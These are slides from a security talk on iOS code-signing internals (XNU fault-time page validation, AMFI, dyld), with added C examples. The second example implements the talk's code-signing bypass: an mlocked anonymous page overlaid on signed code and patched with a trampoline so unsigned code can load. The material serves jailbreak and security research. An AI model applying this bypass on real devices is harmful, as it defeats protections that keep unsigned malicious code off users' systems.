- From Kiev, Ukraine
- Staff Engineer at Lookout
- Focused on XNU, Linux and LLVM internals
- Interested in jailbreak techniques
- Worked on obfuscation and DRM in the past
- Member of the Fried Apple team
Memory protections
- W^X page permission policy: a page can never be both writable and executable
- No dynamic code generation (JIT is only available to specially entitled processes)
- Non-executable stack and heap
- ASLR / KASLR
Code signature format
- The key component of the signature blob is the Code Directory
- Each page of the file is hashed individually and the hash is stored in its own code slot
- Special slots (negative indices) hold the hashes of _CodeResources, Entitlements, etc.
- CDHash: the hash of the whole Code Directory blob, which covers every slot hash
Code signature validation on a page fault
- Validation happens when a page is faulted in
- Validated page: its hash was checked against the slot in the Code Directory
- Tainted page: the computed page hash != the stored page hash
- A process whose code signing status becomes invalid is killed (CS_KILL)
From osfmk/vm/vm_fault.c in XNU, the rule that decides whether a soft fault has to validate the page:

    /*
     * CODE SIGNING:
     * When soft faulting a page, we have to validate the page if:
     * 1. the page is being mapped in user space
     * 2. the page hasn't already been found to be "tainted"
     * 3. the page belongs to a code-signed object
     * 4. the page has not been validated yet or has been mapped for write.
     */
    #define VM_FAULT_NEED_CS_VALIDATION(pmap, page)                 \
            ((pmap) != kernel_pmap /*1*/ &&                         \
             !(page)->cs_tainted /*2*/ &&                           \
             (page)->object->code_signed /*3*/ &&                   \
             (!(page)->cs_validated || (page)->wpmapped /*4*/))
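To make the code-slot layout and the soft-fault rule concrete, here is an added example; it is neither XNU code nor code from the talk. It builds a toy Code Directory with one SHA-256 slot per 4 KiB page of a constructed "binary", mirrors the four macro conditions in `need_cs_validation()`, and re-hashes a page on fault in `cs_validate_page()`, marking it tainted on mismatch. The flat struct layout, the `CS_PAGE_SIZE`/`CS_MAX_SLOTS` limits, the function names and the `wpmapped` reset are assumptions made for the demo; a real Code Directory carries page size, hash type (SHA-1 or SHA-256), slot count and the negative special slots in its header.

```c
#include <stdint.h>
#include <string.h>

/* Minimal SHA-256 (FIPS 180-4) so the example needs no crypto library. */
static const uint32_t K256[64] = {
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 };
#define ROR32(x, n) (((x) >> (n)) | ((x) << (32 - (n))))

static void sha256_block(uint32_t h[8], const uint8_t p[64]) {
    uint32_t w[64], a = h[0], b = h[1], c = h[2], d = h[3], e = h[4], f = h[5], g = h[6], hh = h[7];
    for (int i = 0; i < 16; i++)
        w[i] = (uint32_t)p[4*i] << 24 | (uint32_t)p[4*i+1] << 16 | (uint32_t)p[4*i+2] << 8 | p[4*i+3];
    for (int i = 16; i < 64; i++)
        w[i] = w[i-16] + (ROR32(w[i-15], 7) ^ ROR32(w[i-15], 18) ^ (w[i-15] >> 3))
             + w[i-7]  + (ROR32(w[i-2], 17) ^ ROR32(w[i-2], 19) ^ (w[i-2] >> 10));
    for (int i = 0; i < 64; i++) {
        uint32_t t1 = hh + (ROR32(e, 6) ^ ROR32(e, 11) ^ ROR32(e, 25)) + ((e & f) ^ (~e & g)) + K256[i] + w[i];
        uint32_t t2 = (ROR32(a, 2) ^ ROR32(a, 13) ^ ROR32(a, 22)) + ((a & b) ^ (a & c) ^ (b & c));
        hh = g; g = f; f = e; e = d + t1; d = c; c = b; b = a; a = t1 + t2;
    }
    h[0] += a; h[1] += b; h[2] += c; h[3] += d; h[4] += e; h[5] += f; h[6] += g; h[7] += hh;
}

void sha256(const uint8_t *m, size_t n, uint8_t out[32]) {
    uint32_t h[8] = { 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a,
                      0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 };
    uint8_t buf[64];
    size_t i = 0;
    for (; i + 64 <= n; i += 64) sha256_block(h, m + i);
    size_t rem = n - i;
    memcpy(buf, m + i, rem);
    buf[rem++] = 0x80;                         /* padding: a 1 bit, zeros, then the 64-bit bit length */
    if (rem > 56) { memset(buf + rem, 0, 64 - rem); sha256_block(h, buf); rem = 0; }
    memset(buf + rem, 0, 56 - rem);
    for (int j = 0; j < 8; j++) buf[56 + j] = (uint8_t)(((uint64_t)n * 8) >> (56 - 8 * j));
    sha256_block(h, buf);
    for (int j = 0; j < 8; j++) { out[4*j] = h[j] >> 24; out[4*j+1] = h[j] >> 16; out[4*j+2] = h[j] >> 8; out[4*j+3] = h[j]; }
}

/* Toy Code Directory (constructed layout): one 32-byte code slot per 4 KiB file page. */
enum { CS_PAGE_SIZE = 4096, CS_MAX_SLOTS = 16 };
typedef struct { uint32_t ncode_slots; uint8_t slot[CS_MAX_SLOTS][32]; } code_directory_t;
/* Per-page flags consulted by VM_FAULT_NEED_CS_VALIDATION. */
typedef struct { int cs_validated, cs_tainted, wpmapped; } page_state_t;

static size_t page_len(size_t file_len, uint32_t i) {    /* the last page may be short */
    size_t off = (size_t)i * CS_PAGE_SIZE;
    return file_len - off < CS_PAGE_SIZE ? file_len - off : CS_PAGE_SIZE;
}

/* "Sign": hash every file page into its code slot. */
int cd_build(code_directory_t *cd, const uint8_t *file, size_t len) {
    cd->ncode_slots = (uint32_t)((len + CS_PAGE_SIZE - 1) / CS_PAGE_SIZE);
    if (cd->ncode_slots > CS_MAX_SLOTS) return -1;
    for (uint32_t i = 0; i < cd->ncode_slots; i++)
        sha256(file + (size_t)i * CS_PAGE_SIZE, page_len(len, i), cd->slot[i]);
    return 0;
}

/* CDHash covers the whole directory blob (header + slots), so every slot hash is bound by it. */
void cd_cdhash(const code_directory_t *cd, uint8_t out[32]) {
    sha256((const uint8_t *)cd, sizeof cd->ncode_slots + (size_t)cd->ncode_slots * 32, out);
}

/* The four macro conditions, in the same order as in vm_fault.c. */
int need_cs_validation(int is_kernel_pmap, int object_code_signed, const page_state_t *pg) {
    return !is_kernel_pmap && !pg->cs_tainted && object_code_signed && (!pg->cs_validated || pg->wpmapped);
}

/* Fault-time check: hash the page as it is now and compare it with its slot.
 * Returns 1 when the page validates, 0 when it is tainted (or has no slot at all). */
int cs_validate_page(const code_directory_t *cd, uint32_t slot, const uint8_t *page, size_t n, page_state_t *pg) {
    uint8_t h[32];
    pg->cs_validated = 1;
    pg->wpmapped = 0;                       /* assumption: the write mapping has now been accounted for */
    if (slot >= cd->ncode_slots) { pg->cs_tainted = 1; return 0; }
    sha256(page, n, h);
    pg->cs_tainted = memcmp(h, cd->slot[slot], 32) != 0;
    return !pg->cs_tainted;
}

/* Constructed scenario: sign a 2.5-page "binary", fault every page in, then patch one byte of
 * page 1 through a writable mapping and fault again. Returns the number of tainted pages. */
int demo_tainted_pages(void) {
    static uint8_t file[2 * CS_PAGE_SIZE + 512];
    for (size_t i = 0; i < sizeof file; i++) file[i] = (uint8_t)(i * 7 + 3);
    code_directory_t cd;
    page_state_t pg[3] = { {0, 0, 0}, {0, 0, 0}, {0, 0, 0} };
    if (cd_build(&cd, file, sizeof file) != 0) return -1;
    for (int round = 0; round < 2; round++) {
        if (round == 1) { file[CS_PAGE_SIZE + 16] ^= 0xFF; pg[1].wpmapped = 1; }  /* page 1 modified via RW mapping */
        for (uint32_t i = 0; i < cd.ncode_slots; i++)                            /* soft fault on every page */
            if (need_cs_validation(0, 1, &pg[i]))
                cs_validate_page(&cd, i, file + (size_t)i * CS_PAGE_SIZE, page_len(sizeof file, i), &pg[i]);
    }
    int tainted = 0;                        /* with CS_KILL the process would be killed if this is > 0 */
    for (uint32_t i = 0; i < cd.ncode_slots; i++) tainted += pg[i].cs_tainted;
    return tainted;
}
```

In the second round only page 1 is re-hashed (condition 4 fires through `wpmapped`); pages 0 and 2 were validated in round one and are skipped, which is exactly why writing to a page, or being mapped writable at all, costs a fresh validation and a mismatch.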
Apple Mobile File Integrity (AMFI)
- Kernel extension that registers hooks in the MAC framework (MACF)
- mpo_proc_check_get_task
- mpo_vnode_check_signature
- mpo_vnode_check_exec
- and many more...
Things the new security features get in the way of
- Debugging 3rd-party code
- Logging and tracing API calls
- Reverse engineering and de-obfuscation
- Interposing to the rescue
LC_DYLD_INFO sections
- Rebase Info - contains the rebasing opcodes
- Bind Info - binding info for required (non-lazy) imported symbols
- Lazy Bind Info - binding info for lazily bound imports
- Weak Bind Info - binding info for weak imports
- Export Info - the export trie describing the exported symbols
Details: http://newosxbook.com/articles/DYLD.html
dyld shared cache
- Contains all system frameworks and libraries
- Mapped into every process's address space
- Used for both performance and security reasons
- Its ASLR slide is randomized once, at boot time
Sounds like a plan
✓ mmap a new RW page over the code page
✓ Copy the original content back
✓ Write the trampoline
✓ mprotect to RX
- Do something about code signing (?)
Preventing the page fault
- How can we prevent the page fault (and with it the re-validation)?
- What if we mlock the page ...

    /* PAGE_MASK == PAGE_SIZE - 1 on Darwin, so this rounds data down to its page base */
    mlock((void *)((uintptr_t)data & ~PAGE_MASK), PAGE_SIZE);

- ... and it works!
- Why: validation only runs from the soft-fault path (the macro above); a wired page stays resident and mapped, so a later mprotect() to RX only updates the existing mapping and the page never faults, hence is never validated
Full recipe
✓ Compute the page base
✓ memcpy the page contents to a temporary buffer
✓ mmap a new RW (anonymous) page over it
✓ memcpy the original content back
✓ mlock the page
✓ memcpy the trampoline code
✓ mprotect the page to RX
✓ Hook xmmap and mlock every region that is mapped with exec permission
✓ dlopen unsigned code :)
https://github.com/kpwn/921csbypass
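The recipe above, as an added example that is not the 921csbypass code and not from the talk: it maps a stand-in "signed" RX page holding `mov eax,1; ret` (or the arm64 equivalent), then runs the seven steps (page base, save, anonymous RW overlay with MAP_FIXED, restore, mlock, trampoline write, mprotect back to RX) and calls the page before and after. The stub bytes, the `overlay_and_patch()`/`run_overlay_demo()` names and the use of a freshly mapped page instead of a real dyld image are assumptions for the demo. On Linux, which enforces no code signing, the sequence only shows the mechanics; on iOS 9.2.1 the mlock step is what kept the page from faulting again and being validated. Hooking dyld's xmmap is not shown.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Stand-in "signed" code and the trampoline written over it: tiny leaf
 * functions, so the demo only depends on the two architectures below. */
#if defined(__x86_64__)
static const uint8_t ORIG_CODE[]  = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 };  /* mov eax,1  ; ret */
static const uint8_t TRAMPOLINE[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };  /* mov eax,42 ; ret */
#elif defined(__aarch64__)
static const uint8_t ORIG_CODE[]  = { 0x20, 0x00, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 };  /* mov w0,#1  ; ret */
static const uint8_t TRAMPOLINE[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 };  /* mov w0,#42 ; ret */
#else
#error "demo supports x86_64 and arm64 only"
#endif

typedef int (*code_fn)(void);

static size_t page_sz(void) { return (size_t)sysconf(_SC_PAGESIZE); }

/* One read/execute page holding ORIG_CODE: plays the role of a page of an
 * already-loaded, code-signed image (assumption: a real target would be file-backed). */
void *map_fake_signed_page(void) {
    size_t ps = page_sz();
    void *p = mmap(NULL, ps, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    memcpy(p, ORIG_CODE, sizeof ORIG_CODE);
    __builtin___clear_cache((char *)p, (char *)p + ps);
    if (mprotect(p, ps, PROT_READ | PROT_EXEC) != 0) { munmap(p, ps); return NULL; }
    return p;
}

/* The seven steps from the slides. `target` is the address to patch; the whole
 * page containing it is replaced by an anonymous, wired copy of itself. */
int overlay_and_patch(void *target, const void *patch, size_t patch_len) {
    size_t ps = page_sz();
    uint8_t *base = (uint8_t *)((uintptr_t)target & ~(uintptr_t)(ps - 1));  /* 1. page base */
    uint8_t *tmp = malloc(ps);
    if (!tmp) return -1;
    memcpy(tmp, base, ps);                                                   /* 2. save the page */
    void *p = mmap(base, ps, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);           /* 3. RW anon page over it */
    if (p != (void *)base) { free(tmp); return -2; }
    memcpy(base, tmp, ps);                                                   /* 4. restore contents */
    free(tmp);
    if (mlock(base, ps) != 0)                                                /* 5. wire it: no more faults */
        perror("mlock (non-fatal on Linux; it is the key step on iOS)");
    memcpy(target, patch, patch_len);                                        /* 6. write the trampoline */
    __builtin___clear_cache((char *)base, (char *)base + ps);
    return mprotect(base, ps, PROT_READ | PROT_EXEC) == 0 ? 0 : -3;         /* 7. back to RX */
}

/* Run the scenario: out[0] = result of calling the page before, out[1] = after. */
int run_overlay_demo(int out[2]) {
    void *page = map_fake_signed_page();
    if (!page) return -1;
    code_fn fn = (code_fn)page;
    out[0] = fn();
    int rc = overlay_and_patch(page, TRAMPOLINE, sizeof TRAMPOLINE);
    if (rc != 0) { munmap(page, page_sz()); return rc; }
    out[1] = fn();
    munlock(page, page_sz());
    munmap(page, page_sz());
    return 0;
}

int main(void) {
    int r[2];
    if (run_overlay_demo(r) != 0) { fprintf(stderr, "demo failed\n"); return 1; }
    printf("before: %d  after overlay + trampoline: %d\n", r[0], r[1]);
    return 0;
}
```

Build with `cc -O0 overlay.c -o overlay`. Note the order of steps 5 and 6: the page is wired while still RW, so the subsequent mprotect() to RX changes the protection of a mapping that already exists instead of forcing a new fault on first execution.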